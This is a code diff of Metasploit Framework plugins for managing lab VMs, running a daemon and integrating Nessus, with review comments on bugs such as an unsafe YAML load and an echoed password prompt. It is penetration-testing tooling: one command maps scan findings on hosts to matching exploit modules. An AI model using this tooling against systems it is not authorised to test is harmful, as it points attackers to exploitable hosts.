@@ -14,7 +15,7 @@ class Plugin::Lab < Msf::Plugin
include Msf::Ui::Console::CommandDispatcher
attr_accessor :controller
-
+
def initialize(driver)
super(driver)
@controller = nil
@@ -28,12 +29,12 @@ class Plugin::Lab < Msf::Plugin
"lab_help" => "lab_help - Show that command's description.",
"lab_show" => "lab_show - show all vms in the lab.",
"lab_show_running" => "lab_show_running - show running vms.",
- "lab_load" => "lab_load [file] - load a lab definition from disk.",
+ "lab_load" => "lab_load [file] - load a lab definition from disk.",
"lab_save" => "lab_save [filename] - persist a lab definition in a file.",
- "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
- "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
+ "lab_load_running" => "lab_load_running [type] [user] [host] - use the running vms to create a lab.",
+ "lab_load_config" => "lab_load_config [type] [user] [host] - use the vms in the config to create a lab.",
"lab_load_dir" => "lab_load_dir [type] [directory] - create a lab from a specified directory.",
- "lab_clear" => "lab_clear - clear the running lab.",
+ "lab_clear" => "lab_clear - clear the running lab.",
"lab_start" => "lab_start [vmid+|all] start the specified vm.",
"lab_reset" => "lab_reset [vmid+|all] reset the specified vm.",
"lab_suspend" => "lab_suspend [vmid+|all] suspend the specified vm.",
@@ -48,60 +49,60 @@ class Plugin::Lab < Msf::Plugin
def name
"Lab"
end
-
+
##
## Regular Lab Commands
- ##
+ ##
def cmd_lab_load(*args)
- return lab_usage unless args.count == 1
+ return lab_usage unless args.count == 1
@controller.from_file(args[0])
end
def cmd_lab_load_running(*args)
return lab_usage if args.empty?
-
+
if args[0] =~ /^remote_/
- return lab_usage unless args.count == 3
+ return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_running(args[0], args[1], args[2])
else
- return lab_usage unless args.count == 1
+ return lab_usage unless args.count == 1
@controller.build_from_running(args[0])
end
end
def cmd_lab_load_config(*args)
return lab_usage if args.empty?
-
+
if args[0] =~ /^remote_/
- return lab_usage unless args.count == 3
+ return lab_usage unless args.count == 3
## Expect a username & password
@controller.build_from_config(args[0], args[1], args[2])
else
- return lab_usage unless args.count == 1
+ return lab_usage unless args.count == 1
@controller.build_from_config(args[0])
end
end
- def cmd_lab_load_dir(*args)
+ def cmd_lab_load_dir(*args)
return lab_usage unless args.count == 2
@controller.build_from_dir(args[0],args[1],true)
end
def cmd_lab_clear(*args)
@controller.clear!
- end
+ end
- def cmd_lab_save(*args)
+ def cmd_lab_save(*args)
return lab_usage if args.empty?
@controller.to_file(args[0])
end
-
- ##
+
+ ##
## Commands for dealing with a currently-loaded lab
- ##
+ ##
def cmd_lab_show(*args)
if args.empty?
@@ -112,72 +113,72 @@ class Plugin::Lab < Msf::Plugin
print_line @controller[vmid].to_yaml
else
print_error "Unknown vm '#{vmid}'"
- end
- end
- end
- end
-
- def cmd_lab_show_running(*args)
- hlp_print_lab_running
- end
-
- def cmd_lab_start(*args)
- return lab_usage if args.empty?
-
- if args[0] == "all"
- @controller.each do |vm|
- print_line "Starting lab vm #{vm.vmid}."
- if !vm.running?
- vm.start
- else
- print_line "Lab vm #{vm.vmid} already running."
end
end
- else
- args.each do |arg|
- if @controller.includes_vmid? arg
- vm = @controller.find_by_vmid(arg)
- if !vm.running?
- print_line "Starting lab vm #{vm.vmid}."
- vm.start
- else
- print_line "Lab vm #{vm.vmid} already running."
- end
- end
- end
end
end
-
- def cmd_lab_stop(*args)
+
+ def cmd_lab_show_running(*args)
+ hlp_print_lab_running
+ end
+
+ def cmd_lab_start(*args)
return lab_usage if args.empty?
-
+
if args[0] == "all"
- @controller.each do |vm|
- print_line "Stopping lab vm #{vm.vmid}."
- if vm.running?
- vm.stop
+ @controller.each do |vm|
+ print_line "Starting lab vm #{vm.vmid}."
+ if !vm.running?
+ vm.start
else
- print_line "Lab vm #{vm.vmid} not running."
+ print_line "Lab vm #{vm.vmid} already running."
end
end
else
args.each do |arg|
if @controller.includes_vmid? arg
- vm = @controller.find_by_vmid(arg)
- if vm.running?
- print_line "Stopping lab vm #{vm.vmid}."
- vm.stop
+ vm = @controller.find_by_vmid(arg)
+ if !vm.running?
+ print_line "Starting lab vm #{vm.vmid}."
+ vm.start
else
- print_line "Lab vm #{vm.vmid} not running."
+ print_line "Lab vm #{vm.vmid} already running."
end
- end
+ end
end
end
- end
+ end
+
+ def cmd_lab_stop(*args)
+ return lab_usage if args.empty?
+
+ if args[0] == "all"
+ @controller.each do |vm|
+ print_line "Stopping lab vm #{vm.vmid}."
+ if vm.running?
+ vm.stop
+ else
+ print_line "Lab vm #{vm.vmid} not running."
+ end
+ end
+ else
+ args.each do |arg|
+ if @controller.includes_vmid? arg
+ vm = @controller.find_by_vmid(arg)
+ if vm.running?
+ print_line "Stopping lab vm #{vm.vmid}."
+ vm.stop
+ else
+ print_line "Lab vm #{vm.vmid} not running."
+ end
+ end
+ end
+ end
+ end
def cmd_lab_suspend(*args)
return lab_usage if args.empty?
-
+
if args[0] == "all"
@controller.each{ |vm| vm.suspend }
else
@@ -186,15 +187,15 @@ class Plugin::Lab < Msf::Plugin
if @controller.find_by_vmid(arg).running?
print_line "Suspending lab vm #{arg}."
@controller.find_by_vmid(arg).suspend
- end
- end
+ end
+ end
end
end
- end
+ end
def cmd_lab_reset(*args)
return lab_usage if args.empty?
-
+
if args[0] == "all"
print_line "Resetting all lab vms."
@controller.each{ |vm| vm.reset }
@@ -203,18 +204,18 @@ class Plugin::Lab < Msf::Plugin
if @controller.includes_vmid? arg
if @controller.find_by_vmid(arg).running?
print_line "Resetting lab vm #{arg}."
- @controller.find_by_vmid(arg).reset
+ @controller.find_by_vmid(arg).reset
end
- end
+ end
end
end
- end
+ end
def cmd_lab_snapshot(*args)
return lab_usage if args.count < 2
- snapshot = args[args.count-1]
-
+ snapshot = args[args.count-1]
+
if args[0] == "all"
print_line "Snapshotting all lab vms to snapshot: #{snapshot}."
@controller.each{ |vm| vm.create_snapshot(snapshot) }
@@ -225,12 +226,12 @@ class Plugin::Lab < Msf::Plugin
@controller[vmid_arg].create_snapshot(snapshot)
end
end
- end
+ end
def cmd_lab_revert(*args)
return lab_usage if args.count < 2
- snapshot = args[args.count-1]
+ snapshot = args[args.count-1]
if args[0] == "all"
print_line "Reverting all lab vms to snapshot: #{snapshot}."
@@ -239,10 +240,10 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
print_line "Reverting #{vmid_arg} to snapshot: #{snapshot}."
- @controller[vmid_arg].revert_snapshot(snapshot)
+ @controller[vmid_arg].revert_snapshot(snapshot)
end
end
- end
+ end
def cmd_lab_run_command(*args)
@@ -250,7 +251,7 @@ class Plugin::Lab < Msf::Plugin
command = args[args.count-1]
if args[0] == "all"
print_line "Running command #{command} on all vms."
- @controller.each do |vm|
+ @controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} running command: #{command}."
vm.run_command(command)
@@ -260,19 +261,19 @@ class Plugin::Lab < Msf::Plugin
args[0..-2].each do |vmid_arg|
next unless @controller.includes_vmid? vmid_arg
if @controller[vmid_arg].running?
- print_line "#{vmid_arg} running command: #{command}."
+ print_line "#{vmid_arg} running command: #{command}."
@controller[vmid_arg].run_command(command)
end
end
end
- end
+ end
def cmd_lab_browse_to(*args)
return lab_usage if args.empty?
uri = args[args.count-1]
if args[0] == "all"
print_line "Opening: #{uri} on all vms."
- @controller.each do |vm|
+ @controller.each do |vm|
if vm.running?
print_line "#{vm.vmid} opening to uri: #{uri}."
vm.open_uri(uri)
@@ -288,12 +289,12 @@ class Plugin::Lab < Msf::Plugin
end
end
end
-
+
##
## Commands for help
##
-
+
def longest_cmd_size
commands.keys.map {|x| x.size}.sort.last
end
@@ -332,9 +333,9 @@ class Plugin::Lab < Msf::Plugin
end
end
- print_line
+ print_line
print_line "In order to use this plugin, you'll want to configure a .yml lab file"
- print_line "You can find an example in data/lab/test_targets.yml"
+ print_line "You can find an example in data/lab/test_targets.yml"
print_line
end
@@ -349,18 +350,18 @@ class Plugin::Lab < Msf::Plugin
'Columns' => [ 'Vmid', 'Name', 'Location', "Power?" ]
)
- @controller.each do |vm|
+ @controller.each do |vm|
tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
end
-
+
print_line tbl.to_s
end
-
+
def hlp_print_lab_running
- indent = ' '
+ indent = ' '
tbl = Rex::Ui::Text::Table.new(
'Header' => 'Running Lab VMs',
@@ -369,19 +370,19 @@ class Plugin::Lab < Msf::Plugin
)
@controller.each do |vm|
- if vm.running?
- tbl << [ vm.vmid,
+ if vm.running?
+ tbl << [ vm.vmid,
vm.name,
vm.location,
vm.running?]
- end
+ end
end
print_line tbl.to_s
end
end
-
+
#
# The constructor is called when an instance of the plugin is created. The
# framework instance that the plugin is being associated with is passed in
@@ -427,6 +428,6 @@ class Plugin::Lab < Msf::Plugin
def desc
"Adds the ability to manage VMs"
end
-
+
end ## End Class
end ## End Module
diff --git a/plugins/msfd.rb b/plugins/msfd.rb
index 3eadba8cdc..98b13ce1c5 100644
--- a/plugins/msfd.rb
+++ b/plugins/msfd.rb
@@ -104,13 +104,13 @@ class Plugin::Msfd < Msf::Plugin
addr = Rex::Socket.resolv_nbo(client.peerhost)
if opts['HostsAllowed'] and
- not opts['HostsAllowed'].find { |x| x == addr }
+ not opts['HostsAllowed'].find { |x| x == addr }
client.close
next
end
if opts['HostsDenied'] and
- opts['HostsDenied'].find { |x| x == addr }
+ opts['HostsDenied'].find { |x| x == addr }
client.close
next
end
diff --git a/plugins/nessus.rb b/plugins/nessus.rb
index 62cf968746..a5a8d1cf2f 100644
--- a/plugins/nessus.rb
+++ b/plugins/nessus.rb
@@ -1,16 +1,18 @@
+# $Id$
+# $Revision$
require 'nessus/nessus-xmlrpc'
require 'rex/parser/nessus_xml'
module Msf
-
+
#constants
NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf
Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits.
Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds
-
+
class Plugin::Nessus < Msf::Plugin
-
+
#creates the index of exploit details to make searching for exploits much faster.
def create_xindex
start = Time.now
@@ -19,50 +21,50 @@ module Msf
count = 0
# use Msf::Config.get_config_root as the location.
File.open("#{Xindex}", "w+") do |f|
- #need to add version line.
- f.puts(Msf::Framework::RepoRevision)
- framework.exploits.sort.each { |refname, mod|
- case count
- when 0
- print("\b\b\b[|]")
- count += 1
- when 1
- print("\b\b\b[/]")
- count += 1
- when 2
- print("\b\b\b[-]")
- count += 1
- when 3
- print("\b\b\b[\\]")
- count =0
- end
- stuff = ""
- o = nil
- begin
- o = mod.new
- rescue ::Exception
- end
- stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
- next if not o
- o.references.map do |x|
- if !(x.ctx_id == "URL")
- if (x.ctx_id == "MSB")
- stuff << "|#{x.ctx_val}"
- else
- stuff << "|#{x.ctx_id}-#{x.ctx_val}"
+ #need to add version line.
+ f.puts(Msf::Framework::RepoRevision)
+ framework.exploits.sort.each { |refname, mod|
+ case count
+ when 0
+ print("\b\b\b[|]")
+ count += 1
+ when 1
+ print("\b\b\b[/]")
+ count += 1
+ when 2
+ print("\b\b\b[-]")
+ count += 1
+ when 3
+ print("\b\b\b[\\]")
+ count =0
+ end
+ stuff = ""
+ o = nil
+ begin
+ o = mod.new
+ rescue ::Exception
+ end
+ stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"
+ next if not o
+ o.references.map do |x|
+ if !(x.ctx_id == "URL")
+ if (x.ctx_id == "MSB")
+ stuff << "|#{x.ctx_val}"
+ else
+ stuff << "|#{x.ctx_id}-#{x.ctx_val}"
+ end
end
end
- end
- stuff << "\n"
- f.puts(stuff)
- }
+ stuff << "\n"
+ f.puts(stuff)
+ }
end
total = Time.now - start
print("\b\b\b[*]%clr")
print("\n")
print_status("It has taken : #{total} seconds to build the exploits search index")
end
-
+
def nessus_index
if File.exist?("#{Xindex}")
#check if it's version line matches current version.
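Review bot: `stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}"` dereferences `o` before the `next if not o` guard that follows it, so when `mod.new` raised and `o` is still nil the index build aborts with NoMethodError instead of skipping the module; swap the two lines so `next if not o` comes first. The surrounding `rescue ::Exception` also catches SystemExit and Interrupt, which makes the spinner loop hard to break out of; `rescue ::StandardError` (or a bare `rescue`) is what this best-effort instantiation needs. The enclosing `create_xindex` begins in the previous hunk, and `nessus_index` continues past the end of this one.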
@@ -79,7 +81,7 @@ module Msf
create_xindex
end
end
-
+
class ConsoleCommandDispatcher
include Msf::Ui::Console::CommandDispatcher
def name
@@ -126,11 +128,11 @@ module Msf
"nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit."
}
end
-
+
def cmd_nessus_index
Msf::Plugin::Nessus.nessus_index
end
-
+
def cmd_nessus_save(*args)
#if we are logged in, save session details to nessus.yaml
if args[0] == "-h"
@@ -138,15 +140,15 @@ module Msf
print_status(" nessus_save")
return
end
-
+
if args[0]
print_status("Usage: ")
print_status(" nessus_save")
return
end
-
+
group = "default"
-
+
if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
config = Hash.new
config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}}
@@ -154,15 +156,15 @@ module Msf
f.puts YAML.dump(config)
end
print_good("#{Nessus_yaml} created.")
-
+
else
print_error("Missing username/password/server/port - relogin and then try again.")
return
end
end
-
+
def cmd_nessus_report_exploits(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_summary ")
@@ -172,20 +174,20 @@ module Msf
print_status("%redThis plugin is experimental%clr")
return
end
-
+
if ! nessus_verify_db
print_error("You need a database configured for this command.")
print_error("Connect to a db with \"db_connect\"")
print_error("Then import scan with nessus_report_get")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
rid = nil
-
+
case args.length
when 1
rid = args[0]
@@ -195,12 +197,12 @@ module Msf
print_status("Parses your report and just shows you exploitable vulns.")
return
end
-
+
if check_scan(rid)
print_error("That scan is still running.")
return
end
-
+
#streaming parser ftw.
content = nil
content=@n.report_file_download(rid)
@@ -215,20 +217,20 @@ module Msf
parser.on_found_host = Proc.new { |host|
addr = host['addr'] || host['hname']
addr.gsub!(/[\n\r]/," or ") if addr
-
+
os = host['os']
os.gsub!(/[\n\r]/," or ") if os
-
+
hname = host['hname']
hname.gsub!(/[\n\r]/," or ") if hname
-
+
mac = host['mac']
mac.gsub!(/[\n\r]/," or ") if mac
-
+
host['ports'].each do |item|
-
+
next if item['port'] == 0
-
+
exp = []
msf = nil
nasl = item['nasl'].to_s
@@ -237,21 +239,21 @@ module Msf
name = item['svc_name']
severity = item['severity']
description = item['description']
- cve = item['cve']
+ cve = item['cve']
bid = item['bid']
xref = item['xref']
msf = item['msf']
-
+
# find exploits based on the msf plugin name from the report output.
if msf
regex = Regexp.new(msf, true, 'n')
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
-
+
# find exploits based on CVE
if cve
cve.each do |c|
@@ -259,11 +261,11 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
end
-
+
#find exploits based on BID
if bid
bid.each do |c|
@@ -273,13 +275,13 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
end
-
+
#find exploits based on OSVDB entry
-
+
#find exploits based on MSB
if xref
xref.each do |c|
@@ -289,12 +291,12 @@ module Msf
File.open("#{Xindex}", "r") do |m|
while line = m.gets
exp.push line.split("|").first if (line.match(regex))
- end
+ end
end
end
end
end
-
+
nss = 'NSS-' + nasl
next if exp.empty?
print("#{addr} | #{os} | #{port} | #{nss} | Sev #{severity} | %bld%red#{exp.uniq}%clr\n")
@@ -313,11 +315,11 @@ module Msf
print_status("use nessus_policy_list to list all available policies")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
case args.length
when 2
pid = args[0].to_i
@@ -328,30 +330,30 @@ module Msf
print_status(" use nessus_policy_list to list all available policies")
return
end
-
+
if check_policy(pid)
print_error("That policy does not exist.")
return
end
-
+
tgts = ""
framework.db.hosts(framework.db.workspace).each do |host|
tgts << host.address
tgts << ","
end
-
+
tgts.chop!
-
+
print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning all hosts in workspace")
-
+
scan = @n.scan_new(pid, name, tgts)
-
+
if scan
print_status("Scan started. uid is #{scan}")
end
-
+
end
-
+
def cmd_nessus_logout
@token = nil
print_status("Logged out")
@@ -359,14 +361,14 @@ module Msf
print_good("#{Nessus_yaml} removed.")
return
end
-
+
def cmd_nessus_help(*args)
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Command',
'Help Text'
- ])
+ ]
+ )
tbl << [ "Generic Commands", "" ]
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_connect", "Connect to a nessus server" ]
@@ -415,12 +417,13 @@ module Msf
tbl << [ "-----------------", "-----------------"]
tbl << [ "nessus_policy_list", "List all polciies" ]
tbl << [ "nessus_policy_del", "Delete a policy" ]
- puts "\n"
- puts tbl.to_s + "\n"
+ print_status ""
+ print_status tbl.to_s
+ print_status ""
end
-
+
def cmd_nessus_server_feed(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_feed")
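Review bot: The blank-line and table output is now emitted two different ways: this hunk uses `print_status ""` / `print_status tbl.to_s`, while the following hunks (cmd_nessus_server_feed, cmd_nessus_report_list, cmd_nessus_scan_status, cmd_nessus_template_list, cmd_nessus_user_list, cmd_nessus_server_status, cmd_nessus_plugin_list, cmd_nessus_report_hosts, cmd_nessus_report_host_ports, cmd_nessus_report_host_detail, cmd_nessus_plugin_family, cmd_nessus_policy_list, cmd_nessus_plugin_details, cmd_nessus_server_prefs, cmd_nessus_plugin_prefs) use `print_good "\n"` / `print_good tbl.to_s + "\n"`. If these helpers prefix each call with a status tag and append their own newline, as their names suggest, the "blank" separator becomes a `[+]`-prefixed line followed by an extra empty one, and only the table's first row gets the prefix. One helper used consistently for tables, e.g. `print_line tbl.to_s`, would keep the output uniform across all of these commands.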
@@ -429,23 +432,22 @@ module Msf
print_status("Returns information about the feed type and server version.")
return
end
-
+
if nessus_verify_token
@feed, @version, @web_version = @n.feed
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Feed',
'Nessus Version',
'Nessus Web Version'
])
tbl << [@feed, @version, @web_version]
print_good("Nessus Status")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
end
-
+
def nessus_verify_token
if @token.nil? or @token == ''
ncusage
@@ -453,16 +455,16 @@ module Msf
end
true
end
-
+
def nessus_verify_db
-
+
if ! (framework.db and framework.db.active)
print_error("No database has been configured, please use db_create/db_connect first")
return false
end
true
end
-
+
def ncusage
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -480,9 +482,9 @@ module Msf
print_status("This only works after you have saved creds with nessus_save")
return
end
-
+
def cmd_nessus_connect(*args)
-
+
if ! args[0]
if File.exist?("#{Nessus_yaml}")
lconfig = YAML.load_file("#{Nessus_yaml}")
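Review bot: `lconfig = YAML.load_file("#{Nessus_yaml}")` deserialises the saved-credentials file with the full YAML loader, which can instantiate arbitrary Ruby objects from a file that contains only strings; `lconfig = YAML.safe_load(File.read(Nessus_yaml))` is sufficient for the hash written by cmd_nessus_save and removes that attack surface should the config directory be writable by another account. Since the same file holds the Nessus username and password in plaintext, the `File.open` in cmd_nessus_save (which precedes its hunk) would benefit from an explicit mode, e.g. `File.open(Nessus_yaml, "w", 0600)`. cmd_nessus_connect continues past the end of this hunk.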
@@ -497,7 +499,7 @@ module Msf
return
end
end
-
+
if args[0] == "-h"
print_status("%redYou must do this before any other commands.%clr")
print_status("Usage: ")
@@ -521,19 +523,19 @@ module Msf
print_status("know that nessus used a self signed cert and the risk that presents.")
return
end
-
+
if ! @token == ''
print_error("You are already authenticated. Call nessus_logout before authing again")
return
end
-
+
if(args.length == 0 or args[0].empty?)
ncusage
return
end
-
+
@user = @pass = @host = @port = @sslv = nil
-
+
case args.length
when 1,2
if args[0].include? "@"
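Review bot: `if ! @token == ''` parses as `(!@token) == ''`, which is always false, so the "You are already authenticated" guard never fires and a second nessus_connect silently re-logs in; the intended check is `if @token && !@token.empty?`. This mirrors the `@token.nil? or @token == ''` test in nessus_verify_token, so the two could share one helper. cmd_nessus_connect starts in an earlier hunk and continues past this one.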
@@ -548,7 +550,7 @@ module Msf
@port ||= '8834'
@sslv = args[1]
end
-
+
when 3,4,5
ncusage
return
@@ -556,12 +558,12 @@ module Msf
ncusage
return
end
-
+
if /\/\//.match(@host)
ncusage
return
end
-
+
if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok")
print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker")
print_error(" with the ability to man-in-the-middle the Nessus traffic to capture the Nessus")
@@ -569,36 +571,34 @@ module Msf
print_error(" as an additional parameter to this command.")
return
end
-
+
if ! @user
print_good("Username:")
- $stdout.flush
@user = gets
@user.chomp!
end
-
+
if ! @pass
print_good("Password:")
- $stdout.flush
@pass = gets
@pass.chomp!
end
-
+
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
ncusage
return
end
nessus_login
end
-
+
def nessus_login
-
+
if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
print_status("You need to connect to a server first.")
ncusage
return
end
-
+
@url = "https://#{@host}:#{@port}/"
print_status("Connecting to #{@url} as #{@user}")
@n=NessusXMLRPC::NessusXMLRPC.new(@url,@user,@pass)
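Review bot: `@pass = gets` reads the Nessus password with terminal echo on, so it is shown on screen and lands in any terminal log or scrollback; with the stdlib `io/console` the prompt can read it as `@pass = $stdin.noecho(&:gets)` followed by a `print_line` to restore the cursor (this presumes stdin is a TTY here — confirm under msfconsole's input driver). `Kernel#gets` also reads from ARGF rather than stdin, so `$stdin.gets` is the safer spelling for the username prompt as well. Dropping the two `$stdout.flush` calls is only safe if `print_good` flushes before `gets` blocks; otherwise the prompt may not appear until after input is entered. cmd_nessus_connect begins in an earlier hunk.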
@@ -610,9 +610,9 @@ module Msf
return
end
end
-
+
def cmd_nessus_report_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_list")
@@ -621,35 +621,34 @@ module Msf
print_status("Generates a list of all reports visable to your user.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
list=@n.report_list_hash
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'ID',
'Name',
'Status',
'Date'
])
-
+
list.each {|report|
t = Time.at(report['timestamp'].to_i)
tbl << [ report['id'], report['name'], report['status'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus Report List")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
print_status("You can:")
print_status(" Get a list of hosts from the report: nessus_report_hosts ")
end
-
+
def check_scan(*args)
-
+
case args.length
when 1
rid = args[0]
@@ -657,7 +656,7 @@ module Msf
print_error("No Report ID Supplied")
return
end
-
+
scans = @n.scan_list_hash
scans.each {|scan|
if scan['id'] == rid
@@ -666,9 +665,9 @@ module Msf
}
return false
end
-
+
def cmd_nessus_report_get(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_report_get ")
@@ -680,24 +679,24 @@ module Msf
print_status("Use: nessus_report_list to obtain a list of report id's")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! nessus_verify_db
return
end
-
+
if(args.length == 0 or args[0].empty? or args[0] == "-h")
print_status("Usage: ")
print_status(" nessus_report_get ")
print_status(" use nessus_report_list to list all available reports for importing")
return
end
-
+
rid = nil
-
+
case args.length
when 1
rid = args[0]
@@ -707,7 +706,7 @@ module Msf
print_status(" use nessus_report_list to list all available reports for importing")
return
end
-
+
if check_scan(rid)
print_error("That scan is still running.")
return
@@ -720,41 +719,38 @@ module Msf
end
print_status("importing " + rid)
framework.db.import({:data => content}) do |type,data|
- case type
+ case type
when :address
@count = 0
- print("%bld%blu[*]%clr %bld#{data}%clr")
- $stdout.flush
+ print_line("%bld%blu[*]%clr %bld#{data}%clr")
when :port
- print("\b")
+ print_line("\b")
case @count
when 0
- print("%bld%grn|")
+ print_line("%bld%grn|")
@count += 1
when 1
- print("%bld%grn/")
+ print_line("%bld%grn/")
@count += 1
when 2
- print("%bld%grn-")
+ print_line("%bld%grn-")
@count += 1
when 3
- print("%bld%grn/")
+ print_line("%bld%grn/")
@count = 0
end
- $stdout.flush
when :end
- print("\b Done!%clr\n")
- $stdout.flush
- when :os
+ print_line("\b Done!%clr\n")
+ when :os
data.gsub!(/[\n\r]/," or ") if data
- print(" #{data} ")
- end
+ print_line(" #{data} ")
+ end
end
print_good("Done")
end
-
+
def cmd_nessus_scan_status(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_scan_status")
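Review bot: Switching the `when :port` spinner from `print` to `print_line` defeats it: the `\b` and the `|`, `/`, `-` characters were meant to overwrite one cell in place, and with a newline appended after each call (assuming `print_line` does what its name says) the import now prints one near-empty line per port instead of a spinner. Either keep `print` plus an explicit flush for this branch, or drop the `when :port` branch and the `@count` bookkeeping entirely and emit a single `print_line("%bld%blu[*]%clr %bld#{data}%clr")` per address. The `:end` line should also lose its backspace and trailing newline, `print_line(" Done!%clr")`, to avoid a stray blank line. cmd_nessus_report_get begins in an earlier hunk.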
@@ -763,11 +759,11 @@ module Msf
print_status("Returns a list of information about currently running scans.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
list=@n.scan_list_hash
if list.empty?
print_status("No Scans Running.")
@@ -776,10 +772,9 @@ module Msf
print_status(" Create a scan: nessus_scan_new ")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Scan ID',
'Name',
'Owner',
@@ -788,22 +783,22 @@ module Msf
'Current Hosts',
'Total Hosts'
])
-
+
list.each {|scan|
t = Time.at(scan['start'].to_i)
tbl << [ scan['id'], scan['name'], scan['owner'], t.strftime("%H:%M %b %d %Y"), scan['status'], scan['current'], scan['total'] ]
}
print_good("Running Scans")
- puts "\n"
- puts tbl.to_s + "\n"
- puts "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
+ print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get ")
print_good(" Pause a nessus scan : nessus_scan_pause ")
end
-
+
def cmd_nessus_template_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_template_list")
@@ -812,13 +807,13 @@ module Msf
print_status("Returns a list of information about the server templates..")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
list=@n.template_list_hash
-
+
if list.empty?
print_status("No Templates Created.")
print_status("You can:")
@@ -826,30 +821,29 @@ module Msf
print_status(" Create a template: nessus_template_new ")
return
end
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Template ID',
'Policy ID',
'Name',
'Owner',
'Target'
])
-
+
list.each {|template|
tbl << [ template['name'], template['pid'], template['rname'], template['owner'], template['target'] ]
}
print_good("Templates")
- puts "\n"
- puts tbl.to_s + "\n"
- puts "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
+ print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get ")
end
-
+
def cmd_nessus_user_list(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_user_list")
@@ -858,36 +852,35 @@ module Msf
print_status("Returns a list of the users on the Nessus server and their access level.")
return
end
-
+
if ! nessus_verify_token
return
end
-
+
if ! @n.is_admin
print_status("Your Nessus user is not an admin")
end
-
+
list=@n.users_list
print_good("There are #{list.length} users")
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Name',
'Is Admin?',
'Last Login'
])
-
+
list.each {|user|
t = Time.at(user['lastlogin'].to_i)
tbl << [ user['name'], user['admin'], t.strftime("%H:%M %b %d %Y") ]
}
print_good("Nessus users")
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
def cmd_nessus_server_status(*args)
-
+
if args[0] == "-h"
print_status("Usage: ")
print_status(" nessus_server_status")
@@ -900,19 +893,18 @@ module Msf
if ! nessus_verify_token
return
end
-
+
#Check if we are an admin
if ! @n.is_admin
print_status("You need to be an admin for this.")
return
end
-
+
#Versions
cmd_nessus_server_feed
-
+
tbl = Rex::Ui::Text::Table.new(
- 'Columns' =>
- [
+ 'Columns' => [
'Users',
'Policies',
'Running Scans',
@@ -922,19 +914,19 @@ module Msf
#Count how many users the server has.
list=@n.users_list
users = list.length
-
+
#Count how many policies
list=@n.policy_list_hash
policies = list.length
-
+
#Count how many running scans
list=@n.scan_list_uids
scans = list.length
-
+
#Count how many reports are available
list=@n.report_list_hash
reports = list.length
-
+
#Count how many plugins
list=@n.plugins_list
total = Array.new
@@ -943,12 +935,12 @@ module Msf
}
plugins = total.sum
tbl << [users, policies, scans, reports, plugins]
- puts "\n"
- puts tbl.to_s + "\n"
+ print_good "\n"
+ print_good tbl.to_s + "\n"
end
-
+
